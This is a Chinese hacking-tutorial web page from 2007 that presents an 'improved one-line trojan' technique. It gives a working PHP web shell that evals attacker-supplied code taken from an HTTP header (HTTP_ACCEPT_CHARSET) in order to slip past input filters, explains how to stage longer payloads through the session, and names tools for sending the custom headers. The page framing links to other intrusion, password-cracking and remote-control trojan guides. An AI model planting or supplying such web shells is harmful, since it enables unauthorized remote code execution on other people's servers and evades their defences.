文章分类 | 推荐文章 | 最新文章 | 热点文章 | 最新软件 | 精品软件 | 下载排行 | 推荐下载 | 免费看大片 | WPS | 杀毒软件
清风网络
首 页 软件下载 网络学院 数码学院
QQ 电脑入门 游戏 操作系统 图形处理 办公软件 媒体动画 精文荟萃 工具软件 网络编程 程序开发 网络技术 认证考试 网站建设 文章专栏
当前位置:清风网络学院网络技术黑客技术黑客经验谈:关于一句话木马的更新思想
精品推荐
特别推荐
·简单方法查找黑客老巢
·一次入侵过程的公开分析
·快速利用135端口入侵个人电脑
·基础知识 初级黑客安全技术命令详解
·IPC$入侵的高级手段与方法
·在QQ上与任意陌生人聊天的新绝招
·“黑客”教你如何远程控制计算机
·多种DDoS攻击技术方法
·黑客入侵前的信息收集
·看黑客如何发动对电子邮件系统的攻击
·经典:各个网络端口的入侵方法
·防范黑客 从两大方面阻止域名被劫持
·黑客、红客、蓝客、飞客究竟是什么?
·认清虚虚实实的“ARP攻击”防御方法
·黑客知识 彻底堵死SQL注入工具漏洞
·赛迪网"IT技术百家讲坛"开讲 如何防御黑客?
·黑客如何利用DNS欺骗在局域网中挂马
·Windows黑客编程基础
·黑客很狡猾 如何减轻DDoS攻击危害?
·网络攻击的几种攻击与防御手法大揭秘
热点TOP10
·最详细的黑客入门法则
·“黑客”教你如何远程控制计算机
·我是怎么进入他人计算机的
·黑客技术之知道对方IP入侵别人的电脑
·经典常见计算机密码破解实用手册
·不用任何软件(木马程序)盗取账号密码
·从零开始学黑客:网络黑客新手入门指南
·基础知识 初级黑客安全技术命令详解
·Windows黑客编程基础
·流光5.0使用小窍门
·菜鸟变黑客高手
·Telnet高级入侵攻略及原理
·收费网站破解攻略
·谁能知道微软在你的计算机里隐藏的秘密
·黑客破解电脑密码实用技巧大全!
·迎刃而解——破解密码的常用工具
·经典:各个网络端口的入侵方法
·快速利用135端口入侵个人电脑
·用IE即可轻松远程控制对方电脑
·让对方QQ掉线代码

黑客经验谈:关于一句话木马的更新思想

日期:2007年7月25日 作者: 查看:[大字体 中字体 小字体]


一种关于一句话木马的更新思想

这篇文章大概是涉及到了web,注入,一句话木马,很多人觉脚黑别人网站有点低级和为之不齿,更多名门正派老黑客都不削于这种技术。

传统的一句话木马如果碰到这台机器刚刚好升级,或者因为发现被入侵,装了一套过滤系统,这台机器上的一句话木马基本上成了残废,因为这个时候入侵者的代码数据无法上传到一句话木马,无法运行,也就没了这个功能了。

不过我不知道大家为什么这么久都没发现有一个地方,其实一直存在着漏洞,如果用在一句话木马上,一句话木马的前途将会非常光明。任何的过滤系统都不能够阻挡你的执行数据的目的,就算他的get,post,cookie,xml,rss全部严格过滤也无济于事。甚至这个方法将很难有有效的防治办法。下面介绍这个办法:

先看一段代码:

<?
//$_SERVER里面可以是以下几个:
//HTTP_ACCEPT
//HTTP_ACCEPT_CHARSET
//HTTP_ACCEPT_ENCODING
//HTTP_ACCEPT_LANGUAGE
//HTTP_CONNECTION
//HTTP_HOST
//HTTP_REFERER
//HTTP_USER_AGENT )
?>
<?eval($_SERVER["HTTP_ACCEPT_CHARSET"]);?>

放出这个,肯定很多人就明白了。就是利用http头的一些信息附带你的数据上去,作为一句话木马执行的参数。

不过明白的这些人肯定会有以下几个问题:

1.为什么说很难被防止.

因为http头信息有丰富的非法字符,比如代码中常用的*、逗号、句号、单引号、双银号、小括号等其他的字符,如果把防注入程序用于http头,那恐怕几乎所有的正常数据都将被防止了。所以不可能对http进行过滤,需要非常复杂的的手法才能,相信没有人会去开发这种软件。

2.http头部够长吗?通常要执行的代码将会很长。

我测试过,iis和apache对于http头的数据确实有长度限制,这个限制大概是10,000-15,000个字符,也就是15KB。如此长的容量,我想传个简单的语句上去已经绰绰有余了,况且当真碰到只有100多个字符限制的服务器也可以先增量写入到session,然后从session中取出执行即可。

3.如何利用?

其实写个简单的代码是最好的了,本文附件中有带一个c源代码(gethttp.c)是简单的自定义http头信息,你可以用它来上传你的数据。

其次还可以借助一个工具:accessdriver。

运行之后按f4按键,点击到extras tool页面,点击该页面下的http debugger子页面,在该页面的http address输入你的一句话木马页面,选择mode的get,点击mode上面一点的header data,会出现一个输入框,这个就是给你自定义http头的地方,其他地方我就不用说了。大家看看就会明白,这个工具很好用。

今天就介绍到这里吧。

(出处:清风网络学院






上一篇:防火墙防止DDOS SYN Flood原理详细介绍

下一篇:黑客入侵实战录:一步一个脚印学好入侵

黑客经验谈:关于一句话木马的更新思想 相关文章:
·最详细的黑客入门法则
·“黑客”教你如何远程控制计算机
·初级网管或黑客必需撑握的8个DOS命令
·关于三级片和A片的区分标准
·黑客技术之知道对方IP入侵别人的电脑
·不用任何软件(木马程序)盗取账号密码
·生意人如何做生意:100个成功经验告诉您
·从零开始学黑客:网络黑客新手入门指南
·基础知识 初级黑客安全技术命令详解
·Windows黑客编程基础
黑客经验谈:关于一句话木马的更新思想 相关软件:
·黑客视频教程 VMware虚拟机的安装和使用
·黑客视频教程-灰鸽子远控使用教程
·黑客必备黑客技术宝库电子书籍
·黑客视频教程-最全的一套灰鸽子教程
·木马盾 2008V9.1 Build 0208 新春贺岁版
·黑客视频教程-网吧代理服务器使用灰鸽子端口映射方法
·Windows木马清道夫 2007V11.0 Build 0104上网必备版
·杜鹃蛋关于黑客的书
·黑客视频教程-制作免杀迷你灰鸽子详细教程
·XP糸统守护神 exe 糸统修复 糸统御载 删除流氓软件杀木马

特别声明:本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。
[打印本页] [关闭窗口] 转载请注明来源:http://www.vipcn.net
| 帮助(?) | 版权声明 | 友情连接 | 关于我们 | 信息发布
Copyright 2007 www.vipcn.net All Rights Reserved. 鄂ICP备05000083号Powered by:viphot